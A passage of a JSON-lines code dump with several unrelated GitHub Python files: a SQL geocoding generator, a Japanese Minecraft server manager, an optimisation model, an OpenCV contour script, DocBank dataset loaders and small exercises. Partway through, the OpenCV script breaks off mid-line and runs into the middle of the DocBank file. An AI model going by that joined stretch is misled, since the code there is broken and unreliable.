result['found']\nresult = checkCity(lyr2_in, 'NAME_2', result['notfound'])\nassigned = assigned + result['found']\n\ndoublette = []\nsingle = []\nfor obj in assigned:\n\tfound = False\n\tfor s in single:\n\t\tif obj[0] == s[0]:\n\t\t\tfound = True\n\tif found:\n\t\tdoublette.append(obj)\n\telse:\n\t\tsingle.append(obj)\n\nfor d in doublette:\n\tfor s in single:\n\t\tif d[0] == s[0]:\n\t\t\tsingle.remove(s)\n\t\t\tdoublette.append(s)\n\n\nfh = open('generated/207_addlonlat.sql','wb')\nfor point in single:\n\tsql = (\"UPDATE ot SET f_lat = {}, f_lon = {} \"\n\t\t\t\"WHERE f_country = '{}' AND f_city = '{}';\\n\")\n\tfh.write(sql.format(round(point[2].GetY(),5), round(point[2].GetX(),5), point[1], point[0].encode('utf-8')))\nfh.close()\n\nfh = open('generated/207_addlonlat_manual.sql','wb')\nfor point in doublette:\n\tsql = (\"/* UPDATE ot SET f_lat = {}, f_lon = {} \"\n\t\t\t\"WHERE f_country = '{}' AND f_city = '{}';*/\\n\")\n\tfh.write(sql.format(round(point[2].GetY(),5), round(point[2].GetX(),5), point[1], point[0].encode('utf-8')))\nfh.close()","repo_name":"GolemMediaGmbH/OfficeTemperatureData","sub_path":"02_geochecks/207_checkcity_without_geo.py","file_name":"207_checkcity_without_geo.py","file_ext":"py","file_size_in_byte":2778,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"16"}
+{"seq_id":"40949149275","text":"import subprocess\nimport linecache\nimport platform\nimport shutil\nimport time\nimport sys\nimport os\n\n\"\"\"自作プログラムの読み込み\"\"\"\nfrom Server import make\nfrom Server import proxy as proxy_program\nfrom Etc import etc\nfrom Etc import check\n\ndef exec_java(dir_name, jar_name, xms, xmx, java_argument=\"\"):\n \"\"\"javaを実行するための関数\"\"\"\n # もし入力内容が0かnotだったら1(1GB)に\n cmd = \"java -Xmx\"+xmx+\"G -Xms\"+xms+\"G -jar ./\"+jar_name+\" \"+java_argument\n subprocess.call(cmd, shell=True, cwd=dir_name+\"/\")\n\ndef select_server():\n \"\"\"サーバーを選択する関数\"\"\"\n minecraft_server_list_txt_lines_count = sum(\n [1 for _ in open('data/minecraft-list.txt', encoding=\"utf-8\")])\n minecraft_server_dir_list_txt_lines_count = sum(\n [1 for _ in open('data/minecraft-dir-list.txt', encoding=\"utf-8\")])\n if not minecraft_server_dir_list_txt_lines_count == minecraft_server_list_txt_lines_count:\n print(\"txtファイルの行数が合わないため、続行できません。\")\n sys.exit(1)\n while True:\n with open(\"data/minecraft-list.txt\", \"r\", encoding=\"utf-8\") as file:\n lines = file.read()\n print(lines)\n choice_lines = input(\"サーバーの番号を入力してください: \")\n if not choice_lines or not choice_lines.isdigit():\n continue\n if int(minecraft_server_dir_list_txt_lines_count) < int(choice_lines):\n continue\n break\n return choice_lines\n\ndef start_server():\n \"\"\"サーバーを実行するための `準備` 関数\"\"\"\n print(\"サーバー起動モード\")\n print(\"起動するサーバーを選んでください\\n\")\n choice_server = select_server()\n while True:\n choice_xms = input(\"Xms(サーバー最小割当メモリ)を入力してください(G) ※数字のみ: \")\n choice_xmx = input(\"Xmx(サーバー最大割当メモリ)を入力してください(G) ※数字のみ: \")\n mem_input = [str(choice_xms), str(choice_xmx)]\n for i in mem_input:\n if not i.isdigit():\n continue\n if int(i) < 1:\n continue\n break\n path = linecache.getline('data/minecraft-dir-list.txt', int(choice_server)).replace('\\n', '')\n start_jar = linecache.getline(\"data/\"+path.replace('/', '-')+\".txt\", 2).replace('\\n', '')\n if not os.path.exists(path+\"/\"+start_jar):\n if os.path.exists(path+\"/\"+start_jar.replace(\".jar\", \"\")+\"-universal.jar\"):\n start_jar = start_jar.replace(\".jar\", \"\")+\"-universal.jar\"\n else:\n print(\"起動できません。\\nJarファイルが存在しません。\")\n sys.exit(6)\n exec_java(path, start_jar, mem_input[0], mem_input[1], java_argument=\"nogui\")\n\ndef change_port():\n \"\"\"サーバーのポートを再設定する関数\"\"\"\n print(\"サーバーポート変更モード\")\n print(\"ポートを変更する、サーバーを選択してください。\")\n choice_server = select_server()\n path = linecache.getline('data/minecraft-dir-list.txt', int(choice_server)).replace('\\n', '')\n while True:\n input_port = input(\"再設定するポートを入力してください: \")\n if not input_port or not str.isnumeric(input_port):\n continue\n else:\n break\n make.file_identification_rewriting(path+\"/server.properties\",\n \"server-port=\", \"server-port=\"+input_port+\"\\n\")\n print(\"サーバーのポートを���更しました。\")\n\ndef change_max_player():\n \"\"\"最大参加人数を変更する関数\"\"\"\n print(\"サーバー最大参加人数の変更モード\")\n print(\"最大参加人数を変更したいサーバーを選択してください。\")\n choice_server = select_server()\n path = linecache.getline('data/minecraft-dir-list.txt', int(choice_server)).replace('\\n', '')\n while True:\n input_max_player = input(\"再設定する最大参加人数を入力してください: \")\n if not input_max_player.isdigit():\n continue\n break\n \n make.file_identification_rewriting(path+\"/server.properties\", \"max-players=\", \"max-players=\"+input_max_player+\"\\n\")\n print(\"サーバーの最大参加人数を変更しました。\")\n\ndef add_startup():\n \"\"\"スタートアップ(LinuxではSystemdなど)にMinecraftを実行するbat-shファイルを登録する関数\"\"\"\n print(\"OS起動時 自動起動 設定モード\")\n check.is_admin()\n print(\"設定したいサーバーを選択してください。\")\n user_use_platfrom = platform.system()\n choice_server = select_server()\n path = linecache.getline('data/minecraft-dir-list.txt', int(choice_server)).replace('\\n', '')\n start_jar = linecache.getline(\"data/\"+path.replace('/', '-')+\".txt\", 2).replace('\\n', '')\n absolute_path = os.path.abspath(path)\n while True:\n choice_xms = input(\"Xms(サーバー最小割当メモリ)を入力してください(G) ※数字のみ: \")\n choice_xmx = input(\"Xmx(サーバー最大割当メモリ)を入力してください(G) ※数字のみ: \")\n mem_input = [str(choice_xms), str(choice_xmx)]\n for i in mem_input:\n if not i.isdigit():\n continue\n if int(i) < 1:\n continue\n break\n if user_use_platfrom == \"Windows\":\n try:\n file = open(\"C:/ProgramData/Microsoft/Windows/Start Menu/Programs/StartUp/minecraft\"+path.replace('/', '').replace('minecraft', '')+\".bat\", mode='w')\n file.write(\"java -Xms{xms}G -Xmx{xmx}G -jar {abspath}/{jar_file} nogui \\n\\\n pause\".format(xms = choice_xms, xmx = choice_xmx, abspath = absolute_path, jar_file = start_jar))\n file.close()\n except Exception as excep:\n check.except_print(excep, \"\", True)\n elif user_use_platfrom == \"Linux\":\n if not shutil.which('systemctl'):\n print(\"コマンド:Systemctlが見つかりません\")\n sys.exit(4)\n try:\n file = open(\"/etc/systemd/system/minecraft\"+path.replace('/', '').replace('minecraft', '')+\".service\", mode='w')\n file.write(\"[Unit] \\\n \\nDescription=Minecraft Server: %i \\\n \\nAfter=network.target \\\n \\n[Service] \\\n \\nWorkingDirectory={woking_dir} \\\n \\nRestart=always \\\n \\nExecStart=/usr/bin/java -Xms{xms}G -Xmx{xmx}G -jar {jar_file} nogui \\\n \\n[Install] \\\n \\nWantedBy=multi-user.target\".format(woking_dir = absolute_path, xms = choice_xms, xmx = choice_xmx, jar_file = start_jar))\n file.close()\n subprocess.run(\"sudo systemctl daemon-reload\", shell=True)\n time.sleep(0.8)\n subprocess.run(\"sudo systemctl enable minecraft\"+path.replace('/', '').replace('minecraft', ''), shell=True)\n except Exception as excep:\n check.except_print(excep, \"\", True)\n else:\n print(\"その、OSは対応していません\")\n sys.exit(6)\n print(\"完了しました!\")\n\ndef del_startup():\n print(\"スタートアップ(自動起動設定)の削除\")\n check.is_admin()\n print(\"設定したいサーバーを選択してください。\")\n while True:\n user_use_platfrom = platform.system()\n choice_server = select_server()\n path = linecache.getline('data/minecraft-dir-list.txt', int(choice_server)).replace('\\n', '')\n windows_startup_path = \"C:/ProgramData/Microsoft/Windows/Start Menu/Programs/StartUp/\"\n linux_startup_path = \"/etc/systemd/system/\"\n if os.path.exists(linux_startup_path+\"minecraft\"+path.replace('/', '').replace('minecraft', '')+\".service\") or os.path.exists(windows_startup_path + \"minecraft\" + path.replace('/', '').replace('minecraft', '') + \".bat\"):\n if user_use_platfrom == \"Windows\":\n try:\n os.remove(windows_startup_path+\"minecraft\"+path.replace('/', '').replace('minecraft', '')+\".bat\")\n except Exception as excep:\n check.except_print(excep, \"\", True)\n elif user_use_platfrom == \"Linux\":\n try:\n if not shutil.which('systemctl'):\n print(\"コマンド:Systemctlが見つかりません\")\n sys.exit(4)\n os.remove(linux_startup_path+\"minecraft\"+path.replace('/', '').replace('minecraft', '')+\".service\")\n subprocess.run(\"sudo systemctl daemon-reload\", shell=True)\n except Exception as excep:\n check.except_print(excep, \"\" , True)\n print(\"完了しました!\")\n else:\n print(\"その、サーバーは自動起動設定がされていません\")\n continue\n break\n\ndef make_sh():\n \"\"\"shとbatファイルを生成する関数\"\"\"\n choice_lines = select_server()\n path = linecache.getline('data/minecraft-dir-list.txt', int(choice_lines)).replace('\\n', '')\n while True:\n choice_xms = input(\"Xms(サーバー最小割当メモリ)を入力してください(G) ※数字のみ: \")\n choice_xmx = input(\"Xmx(サーバー最大割当メモリ)を入力してください(G) ※数字のみ: \")\n mem_input = [str(choice_xms), str(choice_xmx)]\n for i in mem_input:\n if not i.isdigit():\n continue\n if int(i) < 1:\n continue\n break\n start_jar = linecache.getline(\"data/\"+path.replace('/', '-')+\".txt\", 2).replace('\\n', '')\n file_name = [\"start.sh\", \"start.bat\"]\n for i in file_name:\n with open(path+\"/\"+i, 'w', encoding=\"utf-8\") as file:\n print(\"echo Start!\\n\",\n \"java -Xms\"+mem_input[0]+\"G\",\n \" -Xmx\"+mem_input[1]+\"G\",\n \" -jar \"+start_jar+\" --nogui\", file=file, sep='')\n print(\"sh-batファイルを作成しました。\")\n\ndef proxy():\n print(\"サーバープロキシモード\")\n local_host = \"127.0.0.1\"\n while True:\n local_port = input(\"出力するポートを入力してください: \")\n if not local_port.isdigit():\n continue\n break\n remote_host = input(\"元のサーバーのホスト名を入力してください: \")\n while True:\n remote_port = input(\"元のサーバーのポート番号を入力してください: \")\n if not remote_port.isdigit():\n continue\n break\n proxy_program.server_loop(local_host, int(local_port), remote_host, int(remote_port))\n print(\"接続が切断されました\")\n\ndef network_info():\n \"\"\"ネットワークのIPなどを確認できる関数\"\"\"\n print(\"\\n注意: IPを公開するのは、危険度が高いです。\\n\",\n \"IPアドレスは重要な情報です。(電話番号のようなものです。) \\n\",\n \"もし、あなたが配信やIPアドレスを見せたくない状況の場合には表示しないことをおすすめします。\",\n \"\\n`yes` か `no`を選択してください。\\n[Y/N]: \")\n network_info_select = etc.input_yes_no(\"\")\n if not network_info_select:\n return False\n active, global_ip, private_ip = check.network(\"https://ifconfig.me\")\n if not active:\n global_ip = \"取得できません。\"\n print(\"プライベートIP (同じネットワークで参加するために必要です。)\"+private_ip)\n print(\"グローバルIP (外のネットワークから参加するために必要です。)\"+global_ip)\n input()\ndef control_server():\n while True:\n print(\"\\nモードを選択してください。\\n\",\n \"サーバー起動モード[run]\\n\",\n \"サーバーポート変更モード[change-port]\\n\",\n \"shとbatファイル作成[sh],[bat]\\n\",\n \"ネットワークの情報確認モード[network]\\n\",\n \"最大参加人数の変更モード,[max-player]\\n\",\n \"スタートアップ(Windows)、Systemd(*Linux)での自動起動の設定モード[add-startup]\\n\",\n \"スタートアップ(Windows)、Systemd(*Linux)での自動起動の解除モード[del-startup]\\n\",\n \"プロキシモード(テスト版)[proxy]\\n\",\n \"戻る | Exit (exit)\\n\",\n \"[R,C-P,S,B,N,M,A,D,P,E]: \", end=\"\")\n choice = input().lower()\n if choice in [\"run\", \"ru\", \"r\"]:\n start_server()\n elif choice in[\"c\", \"ch\", \"cha\", \"chan\", \"chang\",\"change\", \"change-\", \"change-p\", \"change-po\", \"change-por\", \"change-port\", \"port\"]:\n change_port()\n elif choice in[\"sh\", \"s\"]:\n make_sh()\n elif choice in[\"bat\", \"ba\", \"b\"]:\n make_sh()\n elif choice in[\"network\", \"networ\", \"netwo\", \"netw\", \"net\", \"ne\", \"n\"]:\n network_info()\n elif choice in[\"max-player\", \"max-playe\", \"max-play\", \"max-pla\", \"max-pl\", \"max-p\", \"max-\", \"max\", \"ma\", \"m\"]:\n change_max_player()\n elif choice in[\"add-startup\", \"add-startu\", \"add-start\", \"add-star\", \"add-sta\", \"add-st\", \"add-s\", \"add-\", \"add\", \"ad\", \"a\"]:\n add_startup()\n elif choice in[\"del-startup\",\"del-startu\",\"del-start\",\"del-star\",\"del-sta\",\"del-st\",\"del-s\",\"del-\",\"del\",\"de\",\"d\"]:\n del_startup()\n elif choice in [\"proxy\", \"prox\", \"pro\", \"pr\", \"p\"]:\n proxy()\n elif choice in[\"exit\", \"exi\", \"ex\", \"e\"]:\n break\n else:\n print(\"その項目はありません。\")\n","repo_name":"stsaria/Autoer-1","sub_path":"src/Server/control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":13669,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"74464619209","text":"from itertools import combinations\nimport xpress as xp\n\nimport numpy as np\n\n\nclass Solver:\n\n def __init__(self, accs, intervals):\n self.accs = accs\n self.accsNum = len(accs)\n self.intervals = intervals\n self.intNum = len(intervals)\n self.matches = np.array(list(combinations(self.accs, 2)))\n\n self.p = xp.problem()\n self.x = np.array([[[xp.var(vartype=xp.binary) for _ in intervals] for _ in accs] for _ in self.accs])\n self.m = np.array([xp.var(vartype=xp.binary) for _ in self.matches])\n\n self.p.addVariable(self.x, self.m)\n\n def set_constraints(self):\n # t is the index of the time period\n\n for acc in self.accs:\n # no self colab\n for t in range(self.intNum):\n self.p.addConstraint(self.x[acc.index, acc.index, t] == 0)\n\n self.p.addConstraint(xp.Sum(self.m[k] for k in self.get_acc_matches(acc)) <= 1)\n\n # colab with only one for each interval\n for acc_A in self.accs:\n for t in range(self.intNum):\n self.p.addConstraint(\n xp.Sum(self.x[acc_A.index, acc_B.index, t] for acc_B in self.accs) <= 1\n )\n\n k = 0\n for match in self.matches:\n acc_A, acc_B = match[0], match[1]\n self.p.addConstraint(\n xp.Sum(self.x[acc_A.index, acc_B.index, t] for t in range(self.intNum)) <= self.m[k]\n )\n k += 1\n\n def get_acc_matches(self, acc):\n indexes = []\n k = 0\n for match in self.matches:\n if acc.index == match[0].index or acc.index == match[1].index:\n indexes.append(k)\n k += 1\n\n return indexes\n","repo_name":"andygaspar/Natalia","sub_path":"Solver/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"5594543740","text":"import numpy as np\r\nimport cv2\r\nimport math\r\nfrom scipy import ndimage\r\nfrom scipy.ndimage import interpolation as inter\r\nim = cv2.imread('binary3.png',0)\r\nnpim=np.array(im)\r\n\r\nnp1d=np.ndarray.flatten(im)\r\n\r\n#Calculate the center of gravity of image\r\n\r\ncog=ndimage.measurements.center_of_mass(npim)\r\n\r\n#Calculate the entropy of the image\r\n\r\ndef entropy(signal):\r\n '''\r\n function returns entropy of a signal\r\n signal must be a 1-D numpy array\r\n '''\r\n lensig=signal.size\r\n symset=list(set(signal))\r\n numsym=len(symset)\r\n propab=[np.size(signal[signal==i])/(1.0*lensig) for i in symset]\r\n ent=np.sum([p*np.log2(1.0/p) for p in propab])\r\n return ent\r\n\r\nentr=entropy(np1d)\r\n\r\n\r\n#Finding contours of the image\r\n\r\nimage, contours, hierarchy = cv2.findContours(im,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\r\n\r\n#The first contour\r\n\r\ncon=contours[0]\r\n\r\n#Finding the rightmost contour point\r\n\r\nmaxi=0\r\nmaxj=0\r\n\r\nfor i in range(1,len(contours)):\r\n c=contours[i].reshape(-1)\r\n c=c.flatten()\r\n #print(len(c))\r\n for j in range(0,len(c)):\r\n if(j%2==0):\r\n if(c[j]>maxi):\r\n maxi=c[j]\r\n maxj=c[j+1]\r\n\r\n#Finding the bottom most contour point\r\n\r\nbottompointy=0\r\nbottompointx=0\r\n\r\nhighestpointy=200\r\n\r\nfor i in range(0,len(contours)):\r\n c=contours[i].reshape(-1)\r\n c=c.flatten()\r\n #print(len(c))\r\n for j in range(0,len(c)):\r\n if(j%2==1):\r\n if(c[j]>bottompointy):\r\n bottompointy=c[j]\r\n bottompointx=c[j-1]\r\n if(c[j] Union[pd.DataFrame, lp.Layout]:\n \"\"\"Load data annotations as a dataframe\n\n Args:\n filename (str): the abspath to the txt file\n cleanup (bool, optional):\n Whether to cleanup the annotation files, i.e., dropping\n \"##LTLine##\" and \"##LTFigure##\" from the annotation file\n Defaults to True.\n export_layout (bool, optional):\n Whether to convert the output format as lp.Layout format.\n Defaults to True.\n\n Returns:\n Union[pd.DataFrame, lp.Layout]:\n When export_layout=true, return a lp.Layout including all tokens\n Otherwise return a DataFrame.\n Note: the file could be empty.\n \"\"\"\n if os.stat(filename).st_size == 0:\n # Check empty file\n if export_layout:\n return lp.Layout([])\n else:\n return self._empty_df\n\n df = pd.read_csv(filename, sep=\"\\t\", header=None, encoding=\"utf-8\", quoting=3)\n df.columns = [\"text\", \"x_1\", \"y_1\", \"x_2\", \"y_2\", \"R\", \"G\", \"B\", \"font\", \"type\"]\n df[\"text\"] = df[\"text\"].astype(\"str\")\n df = df.reset_index()\n\n if cleanup:\n # Drop all ltline and ltfigure tokens\n df = df[(df[\"text\"] != \"##LTLine##\") & (df[\"text\"] != \"##LTFigure##\")]\n\n if export_layout:\n\n def convert_row_to_rectbox(row):\n rectbox = lp.TextBlock(\n lp.Rectangle(row[\"x_1\"], row[\"y_1\"], row[\"x_2\"], row[\"y_2\"]),\n text=row[\"text\"],\n type=row[\"type\"],\n id=row[\"index\"],\n )\n rectbox.font = row[\"font\"]\n return rectbox\n\n layout = df.apply(convert_row_to_rectbox, axis=1).tolist()\n return lp.Layout(layout)\n else:\n return df\n\n def get_text_anno_path(self, name: str) -> str:\n return os.path.join(self.text_path, name + \".txt\")\n\n def get_image_path(self, name: str) -> str:\n return os.path.join(self.image_path, name + \"_ori.jpg\")\n\n def __getitem__(\n self, idx: int\n ) -> Tuple[str, Union[pd.DataFrame, lp.Layout], Optional[\"Image\"]]:\n \"\"\"Return the name, layout, and image for an item in the dataset.\n\n Returns:\n Tuple[str, Union[pd.DataFrame, lp.Layout], Optional[Image]]:\n the filename of the given item,\n the token info and category annotation\n the image of the file (when self.load_image==True)\n \"\"\"\n\n name = self.all_index[idx]\n\n text_anno_name = self.get_text_anno_path(name)\n text_anno = self.load_annotations(\n text_anno_name, self.cleanup_annotations, self.export_layout\n )\n\n if not self.load_image:\n return name, text_anno\n\n image_anno_name = self.get_image_path(name)\n image = Image.open(image_anno_name)\n w, h = image.size\n text_anno = text_anno.scale((w / 1000, h / 1000))\n # scale the text annotaiton to image size\n return name, text_anno, image\n\n\nclass DocBankBlockClassificationDataset(Dataset):\n def __init__(\n self,\n base_path: str,\n subset: str,\n filename: str = None,\n select_n=None,\n select_ratio=None,\n encode_first=False,\n ):\n \"\"\"A dataloader for the DocBank Block Classification Dataset.\n\n The directory structure is shown as follows:\n\n `base_path`\n ├───dev.json\n ├───train.json\n └───test.json\n\n This dataset is used for training the block text classification model\n in the pipeline method. It is generated by using the blocks predicted by\n visual layout detection models. These models generate block level bounding\n boxes, and we use these blocks for grouping tokens from the docbank dataset.\n It is generated by the xxx.py script, and all the token data is stored in the\n JSON files for better IO performance.\n\n The JSON contains the following fields:\n\n {\n \"data\": a list of block text data, specified below,\n \"labels\": a dict used (label_id, label_name) for the data,\n \"problematic_items\": optional, see below\n }\n\n As for each data item, it is saved as:\n {\n \"words\": a list of words in the text block,\n \"bbox\": a list of block bounding boxes for all words,\n \"labels\": the label_id for this block.\n }\n\n\n Note: Sometimes we might have some tokenization bugs from the dataset. To avoid it from\n disrupting the training process, we can identify these item indices before training and\n excluding them from being loaded during training. These indices are stored in the JSON\n as well, under the field \"problematic_items\".\n\n Args:\n base_path (str):\n The basepath of the docbank dataset folder.\n subset (str):\n The name of the used subset, in \"train\", \"dev\", or \"test\".\n select_n (int, optional):\n The number of instances will be used during training.\n Defaults to None.\n select_ratio (float, optional):\n The fraction of dataset will be used during training.\n Defaults to None.\n filename (str, optional):\n By default, the loading filename will be the same as the `base_path`/`subset`.json.\n But you could set it specifically to override the default filename: `base_path`/`filename`.json\n Defaults to None.\n encode_first (bool, optional):\n Whether to encode the dataset ahead.\n Defaults to False.\n \"\"\"\n\n # TODO: Update the filename and link in the docstring\n\n self.base_path = base_path\n\n self.filename = f\"{base_path}/{subset}.json\"\n if filename is not None:\n self.filename = f\"{base_path}/{filename}\"\n print(f\"Loading from {self.filename}\")\n raw_data = _load_json(self.filename)\n\n _data = raw_data[\"data\"]\n self.labels = raw_data[\"labels\"]\n\n self._data = []\n for ele in _data:\n if ele != {} and len(ele[\"words\"]) == len(ele[\"bbox\"]):\n ele[\"words\"] = [str(word) for word in ele[\"words\"]]\n self._data.append(ele)\n\n self._all_indices = list(range(len(self._data)))\n\n error_idx = self.index_or_load_problematic_items(raw_data)\n\n print(f\"Dropping problematic items {error_idx}\")\n for ele in sorted(error_idx, reverse=True):\n # Remove the problematic indices\n # Start from the last to avoid indices shift in the loop\n del self._all_indices[ele]\n\n if select_n is not None:\n self._all_indices = random.sample(self._all_indices, select_n)\n elif select_ratio is not None:\n self._all_indices = random.sample(\n self._all_indices, int(len(self._all_indices) * select_ratio)\n )\n\n self.encode_first = encode_first\n self._encoded_data = None\n del raw_data\n\n def __getitem__(self, idx):\n if not self.encode_first:\n return self._data[self._all_indices[idx]]\n else:\n if self._encoded_data is None:\n raise ValueError(\"Please run self.encode_data(tokenizer) first\")\n return self._encoded_data[idx]\n\n def __len__(self):\n return len(self._all_indices)\n\n def index_or_load_problematic_items(self, raw_data: Dict) -> List[int]:\n if \"problematic_items\" not in raw_data:\n print(\"problematic_items are not loaded.\")\n error_idx = []\n else:\n print(\"Loading problematic items from file\")\n error_idx = raw_data.get(\"problematic_items\", [])\n return error_idx\n\n def encode_data(self, tokenizer):\n\n self._encoded_data = []\n\n for idx in tqdm(self._all_indices):\n self._encoded_data.append(tokenizer.encode_plus([self._data[idx]]))\n\n\nclass DocBankBlockEmbeddingDataset(DocBankBlockClassificationDataset):\n \"\"\"\"\"\"\n\n LONG_PASSAGE_THRESHOLD = 752\n MAX_SEQ_LEN = 512\n MAX_BLOCK_EMBEDDING_NUMBER = 32\n\n def __init__(\n self,\n base_path: str,\n subset: str,\n filename: str = None,\n select_n=None,\n select_ratio=None,\n encode_first=False,\n add_class_weight=False,\n ):\n \"\"\"A dataloader for the DocBank Block Embedding Dataset.\n\n This dataset is used for training the block embedding LayoutLM model\n It is generated similar to `DocBankBlockClassificationDataset`.\n\n Different from DocBankBlockClassificationDataset, for each data item,\n it stores all text for a page, and also includes a new field call block_ids:\n {\n \"words\": a list of words for the whole page,\n \"bbox\": a list of block bounding boxes for all words,\n \"labels\": a list of label_ids for all tokens,\n \"block_ids\": the block ids for each token on this page\n }\n\n Args:\n base_path (str):\n The basepath of the docbank dataset folder\n subset (str):\n The name of the used subset, in \"train\", \"dev\", or \"test\".\n select_n (int, optional):\n The number of instances will be used during training.\n Defaults to None.\n select_ratio (float, optional):\n The fraction of dataset will be used during training.\n Defaults to None.\n filename (str, optional):\n By default, the loading filename will be the same as the `base_path`/`subset`.json.\n But you could set it specifically to override the default filename: `base_path`/`filename`.json\n Defaults to None.\n encode_first (bool, optional):\n Whether to encode the dataset ahead.\n Defaults to False.\n add_class_weight (bool, optional):\n Whether to encode the dataset ahead.\n Defaults to False.\n \"\"\"\n self.base_path = base_path\n\n self.filename = f\"{base_path}/{subset}.json\"\n if filename is not None:\n self.filename = f\"{base_path}/{filename}\"\n print(f\"Loading from {self.filename}\")\n raw_data = _load_json(self.filename)\n\n self.labels = raw_data[\"labels\"]\n self.files = raw_data.get('files')\n\n self._data = raw_data[\"data\"]\n self._all_indices = list(range(len(self._data)))\n\n error_idx = self.index_or_load_problematic_items(raw_data)\n\n print(f\"Dropping problematic items {error_idx}\")\n for ele in sorted(error_idx, reverse=True):\n # Remove the problematic indices\n # Start from the last to avoid indices shift in the loop\n del self._all_indices[ele]\n\n # NEW IN THIS CLASS\n print(\"Dropping pages of many blocks\")\n self._all_indices = [\n ele\n for ele in self._all_indices\n if max(self._data[ele][\"block_ids\"]) + 1 < self.MAX_BLOCK_EMBEDDING_NUMBER\n ]\n # Because 0 is reserved for \"tokens not in any blocks\"\n\n if select_n is not None:\n self._all_indices = random.sample(self._all_indices, select_n)\n elif select_ratio is not None:\n self._all_indices = random.sample(\n self._all_indices, int(len(self._all_indices) * select_ratio)\n )\n\n self.encode_first = encode_first\n self._encoded_data = None\n\n self.add_class_weight = add_class_weight\n if self.add_class_weight:\n results = list(\n itertools.chain.from_iterable(\n [self._data[idx][\"labels\"] for idx in self._all_indices]\n )\n )\n cnts = Counter(results)\n freq = torch.Tensor([cnts[i] for i in range(len(self.labels))])\n self.class_weight = -torch.log(freq / freq.sum())\n\n n_gpus = torch.cuda.device_count()\n if n_gpus > 1:\n self.class_weight = self.class_weight.unsqueeze(0).repeat(n_gpus, 1)\n\n del raw_data\n\n def __getitem__(self, idx):\n\n item = self._data[self._all_indices[idx]]\n word_count = len(item[\"words\"])\n\n # For longer articles, BERT will only select the first 512 tokens.\n # To expose the model with the tailing text in these longer passages,\n # we randomly sample the starting point.\n\n if word_count > self.LONG_PASSAGE_THRESHOLD:\n start = random.choice([0, word_count - self.MAX_SEQ_LEN])\n item = {key: val[start:word_count] for key, val in item.items()}\n\n if self.add_class_weight:\n item[\"class_weight\"] = self.class_weight\n return item\n\nclass DocBankImageFeatureDataset(DocBankBlockEmbeddingDataset):\n\n def __init__(\n self,\n base_path: str,\n subset: str,\n image_directory=str,\n filename: str = None,\n select_n=None,\n select_ratio=None,\n encode_first=False,\n add_class_weight=False,\n ):\n\n super().__init__(\n base_path = base_path,\n subset = subset,\n filename = filename,\n select_n = select_n,\n select_ratio = select_ratio,\n encode_first = encode_first,\n add_class_weight = add_class_weight,\n )\n\n self.image_directory = image_directory\n\n def __getitem__(self, idx):\n\n item = super().__getitem__(idx)\n \n image_filename = self.files[self._all_indices[idx]].replace('.txt', '_ori.jpg')\n image = cv2.imread(f\"{self.image_directory}/{image_filename}\")\n\n item['image'] = image\n return item","repo_name":"rayfok/scim-nlp","sub_path":"scienceparseplus/src/scienceparseplus/datasets/docbank.py","file_name":"docbank.py","file_ext":"py","file_size_in_byte":17400,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"38877900287","text":"import sys\ninput = sys.stdin.readline\n# input\nN, L = map(int, input().split())\nroad = [None for _ in range(L + 1)]\nfor _ in range(N):\n\td, r, g = map(int, input().split())\n\troad[d] = (r, g)\n# process\n'''\nmax(N)=max(R)=100, max(L)=1000이므로 \n상근이의 최대 대기시간은 10000초 + 이동시간은 1000초.\n'''\ncur = 1\ntime = 0\nwhile cur < L:\n\t# 지금 위치에 신호등이 없을 경우 움직임\n\tif road[cur] is None: cur += 1\n\t# 신호등이 있으면\n\telse:\n\t\tr, g = road[cur]\n\t\t# 초록불일 경우 움직임\n\t\tif not 0 <= time % (r + g) < r: cur += 1\n\ttime += 1\t\n# output\nprint(time)","repo_name":"WaiNaat/BOJ-Python","sub_path":"2980.py","file_name":"2980.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"35840077812","text":"import numpy as np \nimport matplotlib.pyplot as plt \n\n\nclass fisher_discriminator():\n def __init__(self, fname_train):\n self.training_data = self.load_data(fname_train)\n\n # self.class_covariances = None\n # self.class_means = self.calc_means()\n # self.class_determinants = None\n\n\n def train(self,):\n covs = self.calc_covariances()\n\n return\n\n\n def calc_means(self,):\n means = {}\n\n for key in self.training_data.keys():\n mu = np.sum(self.training_data[key], axis=0) # sum over data\n mu = mu / self.training_data[key].shape[0] # divide by N\n means[key] = mu\n\n print(means)\n return means\n\n\n def calc_covariances(self,):\n covs = {}\n means = self.calc_means()\n\n for key in means.keys():\n covs[key] = np.matmul(self.training_data[key].T, self.training_data[key])\n print(covs[key].shape)\n\n return covs\n\n\n def calc_determinants(self,):\n dets = {}\n covs = self.calc_covariances()\n\n for key in covs.keys():\n dets[key] = np.linalg.det(covs[key])\n print(dets[key])\n\n return\n\n\n def load_data(self, fname):\n data_raw = np.genfromtxt(fname, delimiter=' ')\n data = {i : [] for i in range(0, 10)}\n\n for row in data_raw:\n data[int(row[0])].append(row[1:])\n\n for key in data.keys():\n data[key] = np.array(data[key])\n\n return data\n\n\ndef main():\n fd = fisher_discriminator('zip.train')\n fd.calc_determinants()\n means = fd.calc_means()\n print(means)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"rrtroutslater/stat_learning","sub_path":"fisher_discriminator/fisher_discriminator.py","file_name":"fisher_discriminator.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
